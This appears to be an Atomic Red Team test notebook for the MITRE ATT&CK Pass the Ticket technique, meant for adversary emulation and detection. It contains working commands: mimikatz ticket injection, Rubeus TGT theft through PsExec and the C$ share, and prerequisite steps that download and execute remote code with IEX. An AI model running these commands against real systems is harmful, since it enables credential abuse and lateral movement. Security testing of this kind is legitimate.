# T1550.003 - Use Alternate Authentication Material: Pass the Ticket
Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.

When preforming PtT, valid Kerberos tickets for [Valid Accounts](https://attack.mitre.org/techniques/T1078) are captured by [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). A user's service tickets or ticket granting ticket (TGT) may be obtained, depending on the level of access. A service ticket allows for access to a particular resource, whereas a TGT can be used to request service tickets from the Ticket Granting Service (TGS) to access any resource the user has privileges to access.(Citation: ADSecurity AD Kerberos Attacks)(Citation: GentilKiwi Pass the Ticket)

A [Silver Ticket](https://attack.mitre.org/techniques/T1558/002) can be obtained for services that use Kerberos as an authentication mechanism and are used to generate tickets to access that particular resource and the system that hosts the resource (e.g., SharePoint).(Citation: ADSecurity AD Kerberos Attacks)

A [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) can be obtained for the domain using the Key Distribution Service account KRBTGT account NTLM hash, which enables generation of TGTs for any account in Active Directory.(Citation: Campbell 2014)

Adversaries may also create a valid Kerberos ticket using other user information, such as stolen password hashes or AES keys. For example, "overpassing the hash" involves using a NTLM password hash to authenticate as a user (i.e. [Pass the Hash](https://attack.mitre.org/techniques/T1550/002)) while also using the password hash to create a valid Kerberos ticket.(Citation: Stealthbits Overpass-the-Hash)

## Atomic Tests

### Atomic Test #1 - Mimikatz Kerberos Ticket Attack
Similar to PTH, but attacking Kerberos

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: Mimikatz must exist on disk at specified location (#{mimikatz_exe})

##### Check Prereq Commands:
```powershell
if (Test-Path PathToAtomicsFolder\T1550.003\bin\x64\mimikatz.exe) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing) 
$releases = "https://api.github.com/repos/gentilkiwi/mimikatz/releases"
$zipUrl = (Invoke-WebRequest $releases | ConvertFrom-Json)[0].assets.browser_download_url | where-object { $_.endswith(".zip") }
$basePath = Split-Path PathToAtomicsFolder\T1550.003\bin\x64\mimikatz.exe | Split-Path
Invoke-FetchFromZip $zipUrl "x64/mimikatz.exe" $basePath

```

In [ ]:
Invoke-AtomicTest T1550.003 -TestNumbers 1 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
PathToAtomicsFolder\T1550.003\bin\x64\mimikatz.exe "kerberos::ptt None"
```

In [ ]:
Invoke-AtomicTest T1550.003 -TestNumbers 1

### Atomic Test #2 - Rubeus Kerberos Pass The Ticket
Requesting a TGT on a remote system and retrieving it locally before requesting a service ticket with it. This is a Pass-The-Ticket attack because the TGT is obtained on the remote system, then used from a different machine (local).
PsExec is used to execute commands on the remote system, and the "C$" admin share is used to retrieve the TGT, so the current user must have admin rights remotely and other PsExec prerequisites must be met.

**Supported Platforms:** windows
Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: Rubeus must exist on disk at specified location (#{rubeus_path})

##### Check Prereq Commands:
```powershell
if (Test-Path $Env:TEMP\rubeus.exe) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
Invoke-Webrequest -Uri https://github.com/morgansec/Rubeus/raw/de21c6607e9a07182a2d2eea20bb67a22d3fbf95/Rubeus/bin/Debug/Rubeus45.exe -OutFile $Env:TEMP\rubeus.exe

```
##### Description: PsExec must exist on disk at specified location (#{psexec_path})

##### Check Prereq Commands:
```powershell
if (Test-Path C:\PSTools\PsExec.exe) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip"
Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force
New-Item -ItemType Directory (Split-Path "C:\PSTools\PsExec.exe") -Force | Out-Null
Copy-Item $env:TEMP\PsTools\PsExec.exe "C:\PSTools\PsExec.exe" -Force

```

In [ ]:
Invoke-AtomicTest T1550.003 -TestNumbers 2 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
C:\PSTools\PsExec.exe -accepteula \\localhost -w c:\ -c $Env:TEMP\rubeus.exe asktgt /user:Administrator /password:Password /domain:$Env:USERDOMAIN /outfile:ticket.kirbi
Set-Location $env:TEMP
Move-Item -Force "\\localhost\c$\ticket.kirbi" ticket.kirbi
Write-Host "Successfully retrieved TGT from 'localhost', now requesting a TGS from local"
& "$Env:TEMP\rubeus.exe" asktgs /service:cifs/localhost /ticket:ticket.kirbi /ptt
Remove-Item $env:TEMP\ticket.kirbi
& "$Env:TEMP\rubeus.exe" purge      
```

In [ ]:
Invoke-AtomicTest T1550.003 -TestNumbers 2

## Detection
Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.

Event ID 4769 is generated on the Domain Controller when using a golden ticket after the KRBTGT password has been reset twice, as mentioned in the mitigation section. The status code 0x1F indicates the action has failed due to "Integrity check on decrypted field failed" and indicates misuse by a previously invalidated golden ticket.(Citation: CERT-EU Golden Ticket Protection)